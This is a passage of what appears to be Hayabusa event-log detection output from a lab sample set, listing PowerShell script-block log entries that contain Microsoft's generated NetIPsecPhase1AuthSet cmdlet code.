)) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { 